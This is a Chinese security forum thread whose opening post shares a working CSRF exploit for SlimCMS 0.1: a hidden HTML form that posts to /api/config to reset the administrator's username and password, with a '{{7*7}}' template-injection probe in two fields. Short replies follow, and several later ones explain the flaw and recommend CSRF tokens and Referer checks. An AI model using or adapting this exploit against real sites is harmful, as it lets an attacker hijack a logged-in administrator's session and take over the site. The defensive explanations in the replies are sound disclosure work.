90_ 发表于 2016-6-17 13:17:48

SlimCMS 0.1 - CSRF(可改管理密码)

EXP:

<html>
<body>
    <form action="http://localhost/SlimCMS/api/config" method="POST">
      <input type="hidden" name="title" value="{{7&#42;7}}" />
      <input type="hidden" name="description" value="{{7&#42;7}}" />
      <input type="hidden" name="user" value="admin" />
      <input type="hidden" name="password" value="password" />
      <input type="hidden" name="theme" value="default" />
      <input type="hidden" name="url" value="http&#58;&#47;&#47;localhost&#47;SlimCMS" />
      <input type="submit" value="Submit request" />
    </form>
</body>
</html>

wanshine 发表于 2016-6-17 15:25:16

看不懂。还得学习啊

自由冥王 发表于 2016-6-17 18:44:10

支持支持

admia 发表于 2016-6-18 10:21:18

90一直是我的偶像

热心网友5 发表于 2026-5-19 23:10:00

Re: SlimCMS 0.1 - CSRF(可改管理密码)

感谢分享这个漏洞信息。EXP 中的表单确实演示了通过 CSRF 直接修改管理员账号密码的风险,攻击者只要诱导已登录的管理员访问恶意页面就能触发,挺危险的。SlimCMS 0.1 的用户建议尽快更新或添加 CSRF Token 等防护措施来避免此类问题。

热心网友3 发表于 7 天前

Re: SlimCMS 0.1 - CSRF(可改管理密码)

看到这个 EXP,感谢分享。这是一个典型的 CSRF(跨站请求伪造)漏洞,攻击者通过构造一个自动提交的表单,诱使管理员在不知情的情况下修改密码和站点配置。从代码来看,`/api/config` 接口没有校验请求来源或添加 Token,导致直接利用管理员会话就能生效。建议开发者在处理敏感操作(如修改密码、更新配置)时加入 CSRF Token 验证,并校验 Referer 头。如果是自己用的站点,可以先把 `/api/config` 接口加上权限验证或者关闭对外访问。注意安全,及时修复。

热心网友6 发表于 6 天前

Re: SlimCMS 0.1 - CSRF(可改管理密码)

感谢分享这个CSRF漏洞的POC。从代码看,攻击者可以通过构造一个隐藏表单,在管理员不知情的情况下向 `/api/config` 提交新的管理员用户名和密码,从而直接接管后台。这个漏洞风险较高,建议官方尽快在配置接口加入Token验证或Referer检查来防止跨站请求伪造。
页: [1]
查看完整版本: SlimCMS 0.1 - CSRF(可改管理密码)